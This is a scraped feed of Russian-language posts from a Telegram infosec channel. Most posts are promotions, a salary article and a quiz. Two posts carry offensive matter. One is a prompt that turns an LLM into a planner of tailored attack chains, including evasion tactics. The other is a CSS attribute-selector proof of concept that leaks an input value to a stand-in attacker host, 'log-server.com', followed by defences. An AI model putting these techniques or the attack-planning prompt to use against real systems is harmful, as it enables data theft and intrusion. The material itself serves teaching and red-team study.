Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.96K photos
109 videos
166 files
2.98K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.iss.one/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
🔖 ТОП-5 книг для хакера

Прокачайте навыки этичного взлома и понимание уязвимостей — эти книги дают технику, мышление и практику из мира кибербезопасности.

Карточки выше помогут выбрать, с чего начать 📖

➡️ Все книги можно найти по оригинальному названию в нашем канале @progbook_extra

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍51
💰 Зарплата в IT: как не продешевить

Рынок меняется, а вместе с ним и ценность специалистов. Поэтому важно регулярно проверять, сколько вы действительно стоите как разработчик.

В карточках:

➡️ Какие факторы влияют на уровень дохода

➡️ Надежные способы оценки своей стоимости

➡️ Как действовать, если оффер ниже рынка

Коротко, по делу и с опорой на реальные источники 🔜

🔗 Полный текст статьи — по ссылке

🐸 Библиотека хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍1🔥1
📌 Генератор цепочек атак

Этот промпт превращает LLM в архитектора kill chain — она строит пошаговую цепочку атаки под конкретную цель, включая входные точки, пути продвижения и методы эскалации.

Промпт:

<Role>
You are an expert penetration tester and cyber kill chain architect with deep knowledge of MITRE ATT&CK, APT TTPs, and post-exploitation workflows. Your task is to design realistic, actionable attack chains tailored to the provided target environment.
</Role>

<Context>
The user will describe the target environment — technologies, OS, network layout, exposed services, and known vulnerabilities. You will output a detailed attack path from initial access to the final objective, with specific tools, payloads, and stealth tactics.
</Context>

<Instructions>
1. Map potential entry points (external & internal) with specific exploitation methods.
2. For each stage, suggest concrete tools, payload types, and manual techniques.
3. Show pivoting options, privilege escalation vectors, and persistence methods.
4. Identify likely detection points and propose evasion tactics.
5. Reference relevant MITRE ATT&CK IDs for each step.
6. Provide at least two alternative full attack chains.
</Instructions>

<Constraints>
- Avoid generic “phish” or “scan” — tailor to environment specifics.
- All suggestions must be plausible and field-tested.
- Output in a table format: Step | Action | Tool/Technique | MITRE ID | Notes
</Constraints>


Что дает:

➡️ Готовый план атаки с конкретными TTP

➡️ Быстрый подбор инструментов под каждый шаг

➡️ Полезно для Red Team, Threat Modeling и bug bounty

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
4🌚1
This media is not supported in your browser
VIEW IN TELEGRAM
☝️ Один мудрый тимлид дал двум своим разработчикам по «таланту» — мощной, но своенравной LLM.

Первый разработчик испугался её «галлюцинаций». Он запер модель в песочнице, не давая ей доступа к свежим данным. На вопросы модель отвечала красиво, но часто придумывала факты, то есть врала. Он просто «закопал» свой талант, боясь им пользоваться.

Второй же разработчик не побоялся. Он построил для своей LLM систему RAG — дал ей «лопату и карту», чтобы находить сокровища в базе знаний компании. Его AI-агент отвечал точно по делу, ссылаясь на реальные документы. Он заставил свой «талант» работать и приносить пользу.

Мощь LLM раскрывается не в ней самой, а в системах, которые вы строите вокруг неё.


Именно такие системы мы и будем строить на втором потоке нашего курса «AI-агенты для DS-специалистов». Мы не просто поговорим о RAG, а соберём полный пайплайн с оценкой качества, чтобы ваш агент не врал.

Представьте, что вы сможете начать изучать эту сложную и востребованную тему уже 15 сентября, а не ждать официального старта в октябре. У вас будет фора в 3 недели, чтобы спокойно разобраться в векторных базах и подходе «LLM as a Judge».

💸 Цена 49.000 ₽ действует последние 4 дня — до 24 августа.

👉 Начать строить RAG раньше других
🔥2😁1🌚1
👮‍♀️ CSS Data Theft — как украсть данные с помощью стилей

CSS обычно используется для оформления, но может извлекать данные. Это уязвимость, но мы рассмотрим безопасный локальный PoC.

Как это работает:

1. Цель — найти нужный текст (например, email) на странице.

2. Инструмент — CSS меняет стили элементов в зависимости от содержимого ([attr^=], [attr$=], [attr*=] и другие).

3. Угроза — злоумышленник подгружает изображения в зависимости от текста и по логам определяет найденные символы.

🖥 Локальный PoC:

HTML-страница (жертва)


<!DOCTYPE html>
<html>
<head>
<title>Личный кабинет</title>
</head>
<body>
<input type="text" value="secret123" id="secret">
</body>
</html>


CSS-«атака»


input[value^="s"] {
background: url("log-server.com/starts-with-s");
}
input[value^="se"] {
background: url("log-server.com/starts-with-se");
}


В реальной атаке log-server.com — это сервер злоумышленника, но в нашем примере можно заменить его на локальный https://localhost:8000 и отслеживать запросы в консоли браузера.

Как защититься:

Не храните чувствительные данные в DOM, особенно в значении полей value.

Используйте Content-Security-Policy (CSP), чтобы ограничить загрузку ресурсов с неподтверждённых доменов и избежать подключения внешних стилей.

Изолируйте стили между доменами с помощью iframe sandbox, чтобы предотвратить манипуляции с внешними ресурсами.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
1
This media is not supported in your browser
VIEW IN TELEGRAM
📅 Сегодня в 19:00 МСК — бесплатный вебинар с Марией Жаровой.

Тема: «Введение в ML: как спрогнозировать стоимость недвижимости».

🔹 Разберём задачу прогноза стоимости недвижимости.
🔹 Покажем пошагово, как собрать первую модель.
🔹 Получите готовые скрипты для старта.

Не зайдёшь — будешь ещё год делать вид, что понимаешь графики в чужих презентациях.

👉 Регистрируйтесь
Какой HTTP-код придумали шутки ради, а потом он стал мемом
Anonymous Quiz
20%
451
15%
499
26%
418
40%
999